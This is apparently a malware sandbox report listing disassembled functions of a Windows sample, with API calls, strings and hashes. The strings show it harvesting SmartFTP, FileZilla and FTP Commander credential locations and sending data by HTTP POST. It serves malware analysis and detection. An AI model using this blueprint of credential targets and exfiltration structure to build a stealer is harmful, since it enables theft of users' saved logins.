Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA

Uniqueness

Uniqueness Score: -1.00%

Function 004083C4 Relevance: 9.1, APIs: 6, Instructions: 61filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
CloseHandle.KERNEL32(?), ref: 00408452

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00409DF4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00

Strings

POST, xrefs: 00409EBD

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: HttpInternetRequest$ConnectFileOpenReadSend
String ID: POST
API String ID: 961146071-1814004025
Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405136 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB

Strings

SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
folder, xrefs: 00405184
SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
personal favorites, xrefs: 00405176

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: EnvironmentExpandOpenStrings
String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
API String ID: 3923277744-821743658
Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0B5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040A0C0
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

Shell.Explorer, xrefs: 0040A0E8
AtlAxWin, xrefs: 0040A0ED

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CreateHandleInitializeModuleWindow
String ID: AtlAxWin$Shell.Explorer
API String ID: 950422046-1300462704
Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004072ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
__aulldiv.LIBCMT ref: 00407359

Strings

n(@, xrefs: 0040734C, 00407357

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: n(@
API String ID: 3735792614-2525614082
Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
CharLowerW.USER32(?), ref: 0040ABA0
GetCommandLineW.KERNEL32 ref: 0040ABC0

Strings

netprotdrvss.exe, xrefs: 0040ABA6
/updatefile3, xrefs: 0040ABC6

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CharCommandFileLineLowerModuleName
String ID: /updatefile3$netprotdrvss.exe
API String ID: 3118597399-3449771660
Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409FB1 Relevance: 7.6, APIs: 5, Instructions: 53windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409FCE
GetTickCount.KERNEL32 ref: 00409FDE
Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
DispatchMessageW.USER32(?), ref: 0040A009

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00409F2B Relevance: 7.5, APIs: 5, Instructions: 40windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409F5B
GetTickCount.KERNEL32 ref: 00409F5F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
DispatchMessageW.USER32(?), ref: 00409F80
Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58

Uniqueness

Uniqueness Score: -1.00%

Function 00408692 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
SysFreeString.OLEAUT32(?), ref: 0040875A

Strings

http://, xrefs: 00408711
+@, xrefs: 004086A0

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
String ID: http://$+@
API String ID: 147727044-3628382792
Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407D61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

UniqueNum, xrefs: 00407D86
x, xrefs: 00407DEF

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$CreateModuleNamePointerWrite
String ID: UniqueNum$x
API String ID: 594998759-2399716736
Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799

Uniqueness

Uniqueness Score: -1.00%

Function 004040E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

*filezilla*, xrefs: 004040F6
&, xrefs: 00404110
#, xrefs: 0040411E

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$*filezilla*
API String ID: 3438805939-758400021
Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00404A92 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

ftp*commander*, xrefs: 00404AA1
#, xrefs: 00404AC9
&, xrefs: 00404ABB

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$ftp*commander*
API String ID: 3438805939-1149875651
Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409445 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094A9
SysFreeString.OLEAUT32(?), ref: 004094AE

Strings

an.yandex.ru/count, xrefs: 00409478
_blank, xrefs: 0040948E

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: FreeString
String ID: _blank$an.yandex.ru/count
API String ID: 3341692771-25359924
Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69

Uniqueness

Uniqueness Score: -1.00%

Function 00407CD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

\merocz.xc6, xrefs: 00407D1B

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$CreateCurrentDirectoryModuleName
String ID: \merocz.xc6
API String ID: 3818821825-505599559
Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409808 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409868
SysAllocString.OLEAUT32(?), ref: 00409876

Strings

"URL", xrefs: 00409838
"encrypted", xrefs: 00409815

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: AllocString
String ID: "URL"$"encrypted"
API String ID: 2525500382-4151690107
Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040978D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004097ED
SysAllocString.OLEAUT32(?), ref: 004097FB

Strings

"url", xrefs: 0040979A
"domain", xrefs: 004097BD

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: AllocString
String ID: "domain"$"url"
API String ID: 2525500382-2438671658
Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406C77 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91

Strings

Build, xrefs: 00406CA6
w,@, xrefs: 00406CA0
SOFTWARE\Microsoft\Internet Explorer, xrefs: 00406C87

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Open
String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
API String ID: 71445658-3061378640
Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040848F Relevance: 6.1, APIs: 4, Instructions: 81memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B

Memory Dump Source

